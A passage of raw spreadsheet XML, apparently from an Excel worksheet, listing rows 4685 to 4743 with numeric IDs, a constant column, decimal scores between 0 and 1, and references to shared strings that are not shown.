        <v>5592</v>
      </c>
      <c r="G4685" t="s">
        <v>9263</v>
      </c>
      <c r="H4685" t="s">
        <v>9264</v>
      </c>
    </row>
    <row r="4686" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4686" s="1">
        <v>4684</v>
      </c>
      <c r="B4686">
        <v>2645</v>
      </c>
      <c r="C4686">
        <v>2645</v>
      </c>
      <c r="D4686">
        <v>2</v>
      </c>
      <c r="E4686">
        <v>0.90219998359680176</v>
      </c>
      <c r="F4686" t="s">
        <v>5592</v>
      </c>
      <c r="G4686" t="s">
        <v>9265</v>
      </c>
      <c r="H4686" t="s">
        <v>9266</v>
      </c>
    </row>
    <row r="4687" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4687" s="1">
        <v>4685</v>
      </c>
      <c r="B4687">
        <v>3118</v>
      </c>
      <c r="C4687">
        <v>3118</v>
      </c>
      <c r="D4687">
        <v>2</v>
      </c>
      <c r="E4687">
        <v>0.89429998397827148</v>
      </c>
      <c r="F4687" t="s">
        <v>5592</v>
      </c>
      <c r="G4687" t="s">
        <v>9267</v>
      </c>
      <c r="H4687" t="s">
        <v>9268</v>
      </c>
    </row>
    <row r="4688" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4688" s="1">
        <v>4686</v>
      </c>
      <c r="B4688">
        <v>6545</v>
      </c>
      <c r="C4688">
        <v>6545</v>
      </c>
      <c r="D4688">
        <v>2</v>
      </c>
      <c r="E4688">
        <v>0.99519997835159302</v>
      </c>
      <c r="F4688" t="s">
        <v>5592</v>
      </c>
      <c r="G4688" t="s">
        <v>9269</v>
      </c>
      <c r="H4688" t="s">
        <v>9270</v>
      </c>
    </row>
    <row r="4689" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4689" s="1">
        <v>4687</v>
      </c>
      <c r="B4689">
        <v>3389</v>
      </c>
      <c r="C4689">
        <v>3389</v>
      </c>
      <c r="D4689">
        <v>2</v>
      </c>
      <c r="E4689">
        <v>0.62370002269744873</v>
      </c>
      <c r="F4689" t="s">
        <v>5592</v>
      </c>
      <c r="G4689" t="s">
        <v>9271</v>
      </c>
      <c r="H4689" t="s">
        <v>9272</v>
      </c>
    </row>
    <row r="4690" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4690" s="1">
        <v>4688</v>
      </c>
      <c r="B4690">
        <v>3393</v>
      </c>
      <c r="C4690">
        <v>3393</v>
      </c>
      <c r="D4690">
        <v>2</v>
      </c>
      <c r="E4690">
        <v>0.99529999494552612</v>
      </c>
      <c r="F4690" t="s">
        <v>5592</v>
      </c>
      <c r="G4690" t="s">
        <v>9273</v>
      </c>
      <c r="H4690" t="s">
        <v>9274</v>
      </c>
    </row>
    <row r="4691" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4691" s="1">
        <v>4689</v>
      </c>
      <c r="B4691">
        <v>3400</v>
      </c>
      <c r="C4691">
        <v>3400</v>
      </c>
      <c r="D4691">
        <v>2</v>
      </c>
      <c r="E4691">
        <v>0.93839997053146362</v>
      </c>
      <c r="F4691" t="s">
        <v>5592</v>
      </c>
      <c r="G4691" t="s">
        <v>9275</v>
      </c>
      <c r="H4691" t="s">
        <v>9276</v>
      </c>
    </row>
    <row r="4692" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4692" s="1">
        <v>4690</v>
      </c>
      <c r="B4692">
        <v>3406</v>
      </c>
      <c r="C4692">
        <v>3406</v>
      </c>
      <c r="D4692">
        <v>2</v>
      </c>
      <c r="E4692">
        <v>0.99360001087188721</v>
      </c>
      <c r="F4692" t="s">
        <v>5592</v>
      </c>
      <c r="G4692" t="s">
        <v>9277</v>
      </c>
      <c r="H4692" t="s">
        <v>9278</v>
      </c>
    </row>
    <row r="4693" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4693" s="1">
        <v>4691</v>
      </c>
      <c r="B4693">
        <v>6440</v>
      </c>
      <c r="C4693">
        <v>6440</v>
      </c>
      <c r="D4693">
        <v>2</v>
      </c>
      <c r="E4693">
        <v>0.99690002202987671</v>
      </c>
      <c r="F4693" t="s">
        <v>5592</v>
      </c>
      <c r="G4693" t="s">
        <v>9279</v>
      </c>
      <c r="H4693" t="s">
        <v>9280</v>
      </c>
    </row>
    <row r="4694" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4694" s="1">
        <v>4692</v>
      </c>
      <c r="B4694">
        <v>6439</v>
      </c>
      <c r="C4694">
        <v>6439</v>
      </c>
      <c r="D4694">
        <v>2</v>
      </c>
      <c r="E4694">
        <v>0.63739997148513794</v>
      </c>
      <c r="F4694" t="s">
        <v>5592</v>
      </c>
      <c r="G4694" t="s">
        <v>9281</v>
      </c>
      <c r="H4694" t="s">
        <v>9282</v>
      </c>
    </row>
    <row r="4695" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4695" s="1">
        <v>4693</v>
      </c>
      <c r="B4695">
        <v>3426</v>
      </c>
      <c r="C4695">
        <v>3426</v>
      </c>
      <c r="D4695">
        <v>2</v>
      </c>
      <c r="E4695">
        <v>0.9779999852180481</v>
      </c>
      <c r="F4695" t="s">
        <v>5592</v>
      </c>
      <c r="G4695" t="s">
        <v>9283</v>
      </c>
      <c r="H4695" t="s">
        <v>9284</v>
      </c>
    </row>
    <row r="4696" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4696" s="1">
        <v>4694</v>
      </c>
      <c r="B4696">
        <v>6434</v>
      </c>
      <c r="C4696">
        <v>6434</v>
      </c>
      <c r="D4696">
        <v>2</v>
      </c>
      <c r="E4696">
        <v>0.99919998645782471</v>
      </c>
      <c r="F4696" t="s">
        <v>5592</v>
      </c>
      <c r="G4696" t="s">
        <v>9285</v>
      </c>
      <c r="H4696" t="s">
        <v>9286</v>
      </c>
    </row>
    <row r="4697" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4697" s="1">
        <v>4695</v>
      </c>
      <c r="B4697">
        <v>6433</v>
      </c>
      <c r="C4697">
        <v>6433</v>
      </c>
      <c r="D4697">
        <v>2</v>
      </c>
      <c r="E4697">
        <v>0.99930000305175781</v>
      </c>
      <c r="F4697" t="s">
        <v>5592</v>
      </c>
      <c r="G4697" t="s">
        <v>9287</v>
      </c>
      <c r="H4697" t="s">
        <v>9288</v>
      </c>
    </row>
    <row r="4698" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4698" s="1">
        <v>4696</v>
      </c>
      <c r="B4698">
        <v>3430</v>
      </c>
      <c r="C4698">
        <v>3430</v>
      </c>
      <c r="D4698">
        <v>2</v>
      </c>
      <c r="E4698">
        <v>0.98100000619888306</v>
      </c>
      <c r="F4698" t="s">
        <v>5592</v>
      </c>
      <c r="G4698" t="s">
        <v>9289</v>
      </c>
      <c r="H4698" t="s">
        <v>9290</v>
      </c>
    </row>
    <row r="4699" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4699" s="1">
        <v>4697</v>
      </c>
      <c r="B4699">
        <v>6432</v>
      </c>
      <c r="C4699">
        <v>6432</v>
      </c>
      <c r="D4699">
        <v>2</v>
      </c>
      <c r="E4699">
        <v>0.99000000953674316</v>
      </c>
      <c r="F4699" t="s">
        <v>5592</v>
      </c>
      <c r="G4699" t="s">
        <v>9291</v>
      </c>
      <c r="H4699" t="s">
        <v>9292</v>
      </c>
    </row>
    <row r="4700" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4700" s="1">
        <v>4698</v>
      </c>
      <c r="B4700">
        <v>3432</v>
      </c>
      <c r="C4700">
        <v>3432</v>
      </c>
      <c r="D4700">
        <v>2</v>
      </c>
      <c r="E4700">
        <v>0.97750002145767212</v>
      </c>
      <c r="F4700" t="s">
        <v>5592</v>
      </c>
      <c r="G4700" t="s">
        <v>9293</v>
      </c>
      <c r="H4700" t="s">
        <v>8034</v>
      </c>
    </row>
    <row r="4701" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4701" s="1">
        <v>4699</v>
      </c>
      <c r="B4701">
        <v>3433</v>
      </c>
      <c r="C4701">
        <v>3433</v>
      </c>
      <c r="D4701">
        <v>2</v>
      </c>
      <c r="E4701">
        <v>0.62970000505447388</v>
      </c>
      <c r="F4701" t="s">
        <v>5592</v>
      </c>
      <c r="G4701" t="s">
        <v>9294</v>
      </c>
      <c r="H4701" t="s">
        <v>9295</v>
      </c>
    </row>
    <row r="4702" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4702" s="1">
        <v>4700</v>
      </c>
      <c r="B4702">
        <v>3435</v>
      </c>
      <c r="C4702">
        <v>3435</v>
      </c>
      <c r="D4702">
        <v>2</v>
      </c>
      <c r="E4702">
        <v>0.98390001058578491</v>
      </c>
      <c r="F4702" t="s">
        <v>5592</v>
      </c>
      <c r="G4702" t="s">
        <v>9296</v>
      </c>
      <c r="H4702" t="s">
        <v>9297</v>
      </c>
    </row>
    <row r="4703" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4703" s="1">
        <v>4701</v>
      </c>
      <c r="B4703">
        <v>3439</v>
      </c>
      <c r="C4703">
        <v>3439</v>
      </c>
      <c r="D4703">
        <v>2</v>
      </c>
      <c r="E4703">
        <v>0.72829997539520264</v>
      </c>
      <c r="F4703" t="s">
        <v>5592</v>
      </c>
      <c r="G4703" t="s">
        <v>9298</v>
      </c>
      <c r="H4703" t="s">
        <v>9299</v>
      </c>
    </row>
    <row r="4704" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4704" s="1">
        <v>4702</v>
      </c>
      <c r="B4704">
        <v>3441</v>
      </c>
      <c r="C4704">
        <v>3441</v>
      </c>
      <c r="D4704">
        <v>2</v>
      </c>
      <c r="E4704">
        <v>0.9804999828338623</v>
      </c>
      <c r="F4704" t="s">
        <v>5592</v>
      </c>
      <c r="G4704" t="s">
        <v>9300</v>
      </c>
      <c r="H4704" t="s">
        <v>9301</v>
      </c>
    </row>
    <row r="4705" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4705" s="1">
        <v>4703</v>
      </c>
      <c r="B4705">
        <v>6430</v>
      </c>
      <c r="C4705">
        <v>6430</v>
      </c>
      <c r="D4705">
        <v>2</v>
      </c>
      <c r="E4705">
        <v>0.75160002708435059</v>
      </c>
      <c r="F4705" t="s">
        <v>5592</v>
      </c>
      <c r="G4705" t="s">
        <v>9302</v>
      </c>
      <c r="H4705" t="s">
        <v>9303</v>
      </c>
    </row>
    <row r="4706" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4706" s="1">
        <v>4704</v>
      </c>
      <c r="B4706">
        <v>3445</v>
      </c>
      <c r="C4706">
        <v>3445</v>
      </c>
      <c r="D4706">
        <v>2</v>
      </c>
      <c r="E4706">
        <v>0.99550002813339233</v>
      </c>
      <c r="F4706" t="s">
        <v>5592</v>
      </c>
      <c r="G4706" t="s">
        <v>9304</v>
      </c>
      <c r="H4706" t="s">
        <v>9305</v>
      </c>
    </row>
    <row r="4707" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4707" s="1">
        <v>4705</v>
      </c>
      <c r="B4707">
        <v>3446</v>
      </c>
      <c r="C4707">
        <v>3446</v>
      </c>
      <c r="D4707">
        <v>2</v>
      </c>
      <c r="E4707">
        <v>0.99330002069473267</v>
      </c>
      <c r="F4707" t="s">
        <v>5592</v>
      </c>
      <c r="G4707" t="s">
        <v>9306</v>
      </c>
      <c r="H4707" t="s">
        <v>9307</v>
      </c>
    </row>
    <row r="4708" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4708" s="1">
        <v>4706</v>
      </c>
      <c r="B4708">
        <v>3451</v>
      </c>
      <c r="C4708">
        <v>3451</v>
      </c>
      <c r="D4708">
        <v>2</v>
      </c>
      <c r="E4708">
        <v>0.65499997138977051</v>
      </c>
      <c r="F4708" t="s">
        <v>5592</v>
      </c>
      <c r="G4708" t="s">
        <v>9308</v>
      </c>
      <c r="H4708" t="s">
        <v>9309</v>
      </c>
    </row>
    <row r="4709" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4709" s="1">
        <v>4707</v>
      </c>
      <c r="B4709">
        <v>3452</v>
      </c>
      <c r="C4709">
        <v>3452</v>
      </c>
      <c r="D4709">
        <v>2</v>
      </c>
      <c r="E4709">
        <v>0.8628000020980835</v>
      </c>
      <c r="F4709" t="s">
        <v>5592</v>
      </c>
      <c r="G4709" t="s">
        <v>9310</v>
      </c>
      <c r="H4709" t="s">
        <v>9311</v>
      </c>
    </row>
    <row r="4710" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4710" s="1">
        <v>4708</v>
      </c>
      <c r="B4710">
        <v>6444</v>
      </c>
      <c r="C4710">
        <v>6444</v>
      </c>
      <c r="D4710">
        <v>2</v>
      </c>
      <c r="E4710">
        <v>0.95039999485015869</v>
      </c>
      <c r="F4710" t="s">
        <v>5592</v>
      </c>
      <c r="G4710" t="s">
        <v>9312</v>
      </c>
      <c r="H4710" t="s">
        <v>9313</v>
      </c>
    </row>
    <row r="4711" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4711" s="1">
        <v>4709</v>
      </c>
      <c r="B4711">
        <v>6428</v>
      </c>
      <c r="C4711">
        <v>6428</v>
      </c>
      <c r="D4711">
        <v>2</v>
      </c>
      <c r="E4711">
        <v>0.64410001039505005</v>
      </c>
      <c r="F4711" t="s">
        <v>5592</v>
      </c>
      <c r="G4711" t="s">
        <v>9314</v>
      </c>
      <c r="H4711" t="s">
        <v>9315</v>
      </c>
    </row>
    <row r="4712" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4712" s="1">
        <v>4710</v>
      </c>
      <c r="B4712">
        <v>3381</v>
      </c>
      <c r="C4712">
        <v>3381</v>
      </c>
      <c r="D4712">
        <v>2</v>
      </c>
      <c r="E4712">
        <v>0.56849998235702515</v>
      </c>
      <c r="F4712" t="s">
        <v>5592</v>
      </c>
      <c r="G4712" t="s">
        <v>9316</v>
      </c>
      <c r="H4712" t="s">
        <v>9317</v>
      </c>
    </row>
    <row r="4713" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4713" s="1">
        <v>4711</v>
      </c>
      <c r="B4713">
        <v>3378</v>
      </c>
      <c r="C4713">
        <v>3378</v>
      </c>
      <c r="D4713">
        <v>2</v>
      </c>
      <c r="E4713">
        <v>0.60250002145767212</v>
      </c>
      <c r="F4713" t="s">
        <v>5592</v>
      </c>
      <c r="G4713" t="s">
        <v>9318</v>
      </c>
      <c r="H4713" t="s">
        <v>9319</v>
      </c>
    </row>
    <row r="4714" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4714" s="1">
        <v>4712</v>
      </c>
      <c r="B4714">
        <v>3327</v>
      </c>
      <c r="C4714">
        <v>3327</v>
      </c>
      <c r="D4714">
        <v>2</v>
      </c>
      <c r="E4714">
        <v>0.93620002269744873</v>
      </c>
      <c r="F4714" t="s">
        <v>5592</v>
      </c>
      <c r="G4714" t="s">
        <v>9320</v>
      </c>
      <c r="H4714" t="s">
        <v>9321</v>
      </c>
    </row>
    <row r="4715" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4715" s="1">
        <v>4713</v>
      </c>
      <c r="B4715">
        <v>6472</v>
      </c>
      <c r="C4715">
        <v>6472</v>
      </c>
      <c r="D4715">
        <v>2</v>
      </c>
      <c r="E4715">
        <v>0.49639999866485601</v>
      </c>
      <c r="F4715" t="s">
        <v>5592</v>
      </c>
      <c r="G4715" t="s">
        <v>9322</v>
      </c>
      <c r="H4715" t="s">
        <v>9323</v>
      </c>
    </row>
    <row r="4716" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4716" s="1">
        <v>4714</v>
      </c>
      <c r="B4716">
        <v>3342</v>
      </c>
      <c r="C4716">
        <v>3342</v>
      </c>
      <c r="D4716">
        <v>2</v>
      </c>
      <c r="E4716">
        <v>0.77609997987747192</v>
      </c>
      <c r="F4716" t="s">
        <v>5592</v>
      </c>
      <c r="G4716" t="s">
        <v>9324</v>
      </c>
      <c r="H4716" t="s">
        <v>9325</v>
      </c>
    </row>
    <row r="4717" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4717" s="1">
        <v>4715</v>
      </c>
      <c r="B4717">
        <v>3343</v>
      </c>
      <c r="C4717">
        <v>3343</v>
      </c>
      <c r="D4717">
        <v>2</v>
      </c>
      <c r="E4717">
        <v>0.55570000410079956</v>
      </c>
      <c r="F4717" t="s">
        <v>5592</v>
      </c>
      <c r="G4717" t="s">
        <v>9326</v>
      </c>
      <c r="H4717" t="s">
        <v>9327</v>
      </c>
    </row>
    <row r="4718" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4718" s="1">
        <v>4716</v>
      </c>
      <c r="B4718">
        <v>3345</v>
      </c>
      <c r="C4718">
        <v>3345</v>
      </c>
      <c r="D4718">
        <v>2</v>
      </c>
      <c r="E4718">
        <v>0.96640002727508545</v>
      </c>
      <c r="F4718" t="s">
        <v>5592</v>
      </c>
      <c r="G4718" t="s">
        <v>9328</v>
      </c>
      <c r="H4718" t="s">
        <v>9329</v>
      </c>
    </row>
    <row r="4719" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4719" s="1">
        <v>4717</v>
      </c>
      <c r="B4719">
        <v>6467</v>
      </c>
      <c r="C4719">
        <v>6467</v>
      </c>
      <c r="D4719">
        <v>2</v>
      </c>
      <c r="E4719">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4719" t="s">
        <v>5592</v>
      </c>
      <c r="G4719" t="s">
        <v>9330</v>
      </c>
      <c r="H4719" t="s">
        <v>9331</v>
      </c>
    </row>
    <row r="4720" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4720" s="1">
        <v>4718</v>
      </c>
      <c r="B4720">
        <v>3353</v>
      </c>
      <c r="C4720">
        <v>3353</v>
      </c>
      <c r="D4720">
        <v>2</v>
      </c>
      <c r="E4720">
        <v>0.99470001459121704</v>
      </c>
      <c r="F4720" t="s">
        <v>5592</v>
      </c>
      <c r="G4720" t="s">
        <v>9332</v>
      </c>
      <c r="H4720" t="s">
        <v>9333</v>
      </c>
    </row>
    <row r="4721" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4721" s="1">
        <v>4719</v>
      </c>
      <c r="B4721">
        <v>3354</v>
      </c>
      <c r="C4721">
        <v>3354</v>
      </c>
      <c r="D4721">
        <v>2</v>
      </c>
      <c r="E4721">
        <v>0.57609999179840088</v>
      </c>
      <c r="F4721" t="s">
        <v>5592</v>
      </c>
      <c r="G4721" t="s">
        <v>9334</v>
      </c>
      <c r="H4721" t="s">
        <v>9335</v>
      </c>
    </row>
    <row r="4722" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4722" s="1">
        <v>4720</v>
      </c>
      <c r="B4722">
        <v>6456</v>
      </c>
      <c r="C4722">
        <v>6456</v>
      </c>
      <c r="D4722">
        <v>2</v>
      </c>
      <c r="E4722">
        <v>0.97990000247955322</v>
      </c>
      <c r="F4722" t="s">
        <v>5592</v>
      </c>
      <c r="G4722" t="s">
        <v>9336</v>
      </c>
      <c r="H4722" t="s">
        <v>9337</v>
      </c>
    </row>
    <row r="4723" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4723" s="1">
        <v>4721</v>
      </c>
      <c r="B4723">
        <v>3361</v>
      </c>
      <c r="C4723">
        <v>3361</v>
      </c>
      <c r="D4723">
        <v>2</v>
      </c>
      <c r="E4723">
        <v>0.81770002841949463</v>
      </c>
      <c r="F4723" t="s">
        <v>5592</v>
      </c>
      <c r="G4723" t="s">
        <v>9338</v>
      </c>
      <c r="H4723" t="s">
        <v>9339</v>
      </c>
    </row>
    <row r="4724" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4724" s="1">
        <v>4722</v>
      </c>
      <c r="B4724">
        <v>6453</v>
      </c>
      <c r="C4724">
        <v>6453</v>
      </c>
      <c r="D4724">
        <v>2</v>
      </c>
      <c r="E4724">
        <v>0.74599999189376831</v>
      </c>
      <c r="F4724" t="s">
        <v>5592</v>
      </c>
      <c r="G4724" t="s">
        <v>9340</v>
      </c>
      <c r="H4724" t="s">
        <v>9341</v>
      </c>
    </row>
    <row r="4725" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4725" s="1">
        <v>4723</v>
      </c>
      <c r="B4725">
        <v>3365</v>
      </c>
      <c r="C4725">
        <v>3365</v>
      </c>
      <c r="D4725">
        <v>2</v>
      </c>
      <c r="E4725">
        <v>0.98900002241134644</v>
      </c>
      <c r="F4725" t="s">
        <v>5592</v>
      </c>
      <c r="G4725" t="s">
        <v>9342</v>
      </c>
      <c r="H4725" t="s">
        <v>9343</v>
      </c>
    </row>
    <row r="4726" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4726" s="1">
        <v>4724</v>
      </c>
      <c r="B4726">
        <v>3366</v>
      </c>
      <c r="C4726">
        <v>3366</v>
      </c>
      <c r="D4726">
        <v>2</v>
      </c>
      <c r="E4726">
        <v>0.83980000019073486</v>
      </c>
      <c r="F4726" t="s">
        <v>5592</v>
      </c>
      <c r="G4726" t="s">
        <v>9344</v>
      </c>
      <c r="H4726" t="s">
        <v>9345</v>
      </c>
    </row>
    <row r="4727" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4727" s="1">
        <v>4725</v>
      </c>
      <c r="B4727">
        <v>3367</v>
      </c>
      <c r="C4727">
        <v>3367</v>
      </c>
      <c r="D4727">
        <v>2</v>
      </c>
      <c r="E4727">
        <v>0.33149999380111689</v>
      </c>
      <c r="F4727" t="s">
        <v>5592</v>
      </c>
      <c r="G4727" t="s">
        <v>9346</v>
      </c>
      <c r="H4727" t="s">
        <v>9347</v>
      </c>
    </row>
    <row r="4728" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4728" s="1">
        <v>4726</v>
      </c>
      <c r="B4728">
        <v>3369</v>
      </c>
      <c r="C4728">
        <v>3369</v>
      </c>
      <c r="D4728">
        <v>2</v>
      </c>
      <c r="E4728">
        <v>0.72289997339248657</v>
      </c>
      <c r="F4728" t="s">
        <v>5592</v>
      </c>
      <c r="G4728" t="s">
        <v>9348</v>
      </c>
      <c r="H4728" t="s">
        <v>9349</v>
      </c>
    </row>
    <row r="4729" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4729" s="1">
        <v>4727</v>
      </c>
      <c r="B4729">
        <v>3370</v>
      </c>
      <c r="C4729">
        <v>3370</v>
      </c>
      <c r="D4729">
        <v>2</v>
      </c>
      <c r="E4729">
        <v>0.99049997329711914</v>
      </c>
      <c r="F4729" t="s">
        <v>5592</v>
      </c>
      <c r="G4729" t="s">
        <v>9350</v>
      </c>
      <c r="H4729" t="s">
        <v>9351</v>
      </c>
    </row>
    <row r="4730" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4730" s="1">
        <v>4728</v>
      </c>
      <c r="B4730">
        <v>3371</v>
      </c>
      <c r="C4730">
        <v>3371</v>
      </c>
      <c r="D4730">
        <v>2</v>
      </c>
      <c r="E4730">
        <v>0.94789999723434448</v>
      </c>
      <c r="F4730" t="s">
        <v>5592</v>
      </c>
      <c r="G4730" t="s">
        <v>9352</v>
      </c>
      <c r="H4730" t="s">
        <v>9353</v>
      </c>
    </row>
    <row r="4731" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4731" s="1">
        <v>4729</v>
      </c>
      <c r="B4731">
        <v>3372</v>
      </c>
      <c r="C4731">
        <v>3372</v>
      </c>
      <c r="D4731">
        <v>2</v>
      </c>
      <c r="E4731">
        <v>0.68919998407363892</v>
      </c>
      <c r="F4731" t="s">
        <v>5592</v>
      </c>
      <c r="G4731" t="s">
        <v>9354</v>
      </c>
      <c r="H4731" t="s">
        <v>9355</v>
      </c>
    </row>
    <row r="4732" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4732" s="1">
        <v>4730</v>
      </c>
      <c r="B4732">
        <v>6449</v>
      </c>
      <c r="C4732">
        <v>6449</v>
      </c>
      <c r="D4732">
        <v>2</v>
      </c>
      <c r="E4732">
        <v>0.98479998111724854</v>
      </c>
      <c r="F4732" t="s">
        <v>5592</v>
      </c>
      <c r="G4732" t="s">
        <v>9356</v>
      </c>
      <c r="H4732" t="s">
        <v>9357</v>
      </c>
    </row>
    <row r="4733" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4733" s="1">
        <v>4731</v>
      </c>
      <c r="B4733">
        <v>3375</v>
      </c>
      <c r="C4733">
        <v>3375</v>
      </c>
      <c r="D4733">
        <v>2</v>
      </c>
      <c r="E4733">
        <v>0.57289999723434448</v>
      </c>
      <c r="F4733" t="s">
        <v>5592</v>
      </c>
      <c r="G4733" t="s">
        <v>9358</v>
      </c>
      <c r="H4733" t="s">
        <v>9359</v>
      </c>
    </row>
    <row r="4734" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4734" s="1">
        <v>4732</v>
      </c>
      <c r="B4734">
        <v>6448</v>
      </c>
      <c r="C4734">
        <v>6448</v>
      </c>
      <c r="D4734">
        <v>2</v>
      </c>
      <c r="E4734">
        <v>0.99709999561309814</v>
      </c>
      <c r="F4734" t="s">
        <v>5592</v>
      </c>
      <c r="G4734" t="s">
        <v>9360</v>
      </c>
      <c r="H4734" t="s">
        <v>9361</v>
      </c>
    </row>
    <row r="4735" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4735" s="1">
        <v>4733</v>
      </c>
      <c r="B4735">
        <v>6447</v>
      </c>
      <c r="C4735">
        <v>6447</v>
      </c>
      <c r="D4735">
        <v>2</v>
      </c>
      <c r="E4735">
        <v>0.34110000729560852</v>
      </c>
      <c r="F4735" t="s">
        <v>5592</v>
      </c>
      <c r="G4735" t="s">
        <v>9362</v>
      </c>
      <c r="H4735" t="s">
        <v>9363</v>
      </c>
    </row>
    <row r="4736" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4736" s="1">
        <v>4734</v>
      </c>
      <c r="B4736">
        <v>6427</v>
      </c>
      <c r="C4736">
        <v>6427</v>
      </c>
      <c r="D4736">
        <v>2</v>
      </c>
      <c r="E4736">
        <v>0.99750000238418579</v>
      </c>
      <c r="F4736" t="s">
        <v>5592</v>
      </c>
      <c r="G4736" t="s">
        <v>9364</v>
      </c>
      <c r="H4736" t="s">
        <v>9365</v>
      </c>
    </row>
    <row r="4737" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4737" s="1">
        <v>4735</v>
      </c>
      <c r="B4737">
        <v>3466</v>
      </c>
      <c r="C4737">
        <v>3466</v>
      </c>
      <c r="D4737">
        <v>2</v>
      </c>
      <c r="E4737">
        <v>0.68629997968673706</v>
      </c>
      <c r="F4737" t="s">
        <v>5592</v>
      </c>
      <c r="G4737" t="s">
        <v>9366</v>
      </c>
      <c r="H4737" t="s">
        <v>9367</v>
      </c>
    </row>
    <row r="4738" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4738" s="1">
        <v>4736</v>
      </c>
      <c r="B4738">
        <v>3468</v>
      </c>
      <c r="C4738">
        <v>3468</v>
      </c>
      <c r="D4738">
        <v>2</v>
      </c>
      <c r="E4738">
        <v>0.51789999008178711</v>
      </c>
      <c r="F4738" t="s">
        <v>5592</v>
      </c>
      <c r="G4738" t="s">
        <v>9368</v>
      </c>
      <c r="H4738" t="s">
        <v>9369</v>
      </c>
    </row>
    <row r="4739" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4739" s="1">
        <v>4737</v>
      </c>
      <c r="B4739">
        <v>6393</v>
      </c>
      <c r="C4739">
        <v>6393</v>
      </c>
      <c r="D4739">
        <v>2</v>
      </c>
      <c r="E4739">
        <v>0.48640000820159912</v>
      </c>
      <c r="F4739" t="s">
        <v>5592</v>
      </c>
      <c r="G4739" t="s">
        <v>9370</v>
      </c>
      <c r="H4739" t="s">
        <v>9371</v>
      </c>
    </row>
    <row r="4740" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4740" s="1">
        <v>4738</v>
      </c>
      <c r="B4740">
        <v>3603</v>
      </c>
      <c r="C4740">
        <v>3603</v>
      </c>
      <c r="D4740">
        <v>2</v>
      </c>
      <c r="E4740">
        <v>0.99140000343322754</v>
      </c>
      <c r="F4740" t="s">
        <v>5592</v>
      </c>
      <c r="G4740" t="s">
        <v>9372</v>
      </c>
      <c r="H4740" t="s">
        <v>9373</v>
      </c>
    </row>
    <row r="4741" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4741" s="1">
        <v>4739</v>
      </c>
      <c r="B4741">
        <v>3604</v>
      </c>
      <c r="C4741">
        <v>3604</v>
      </c>
      <c r="D4741">
        <v>2</v>
      </c>
      <c r="E4741">
        <v>0.99360001087188721</v>
      </c>
      <c r="F4741" t="s">
        <v>5592</v>
      </c>
      <c r="G4741" t="s">
        <v>9374</v>
      </c>
      <c r="H4741" t="s">
        <v>9375</v>
      </c>
    </row>
    <row r="4742" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4742" s="1">
        <v>4740</v>
      </c>
      <c r="B4742">
        <v>3605</v>
      </c>
      <c r="C4742">
        <v>3605</v>
      </c>
      <c r="D4742">
        <v>2</v>
      </c>
      <c r="E4742">
        <v>0.79240000247955322</v>
      </c>
      <c r="F4742" t="s">
        <v>5592</v>
      </c>
      <c r="G4742" t="s">
        <v>9376</v>
      </c>
      <c r="H4742" t="s">
        <v>9377</v>
      </c>
    </row>
    <row r="4743" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4743" s="1">
        <v>4741</v>
      </c>
      <c r="B4743">
        <v>3607</v>
      </c>
      <c r="C4743">
        <v>3607</v>
      </c>
      <c r="D4743">
        <v>2</v>
      </c>
      <c r="E4743">
        <v>0.9625999927520752</v>
      </c>
      <c r="F4743" t="s">
        <v>5592</v>
      </c>
      <c r="G4743" t="s">
        <v>9378</v>
      </c>
      <c r="H4743" t="s">
        <v>9379</v>
      </c>
    </row>
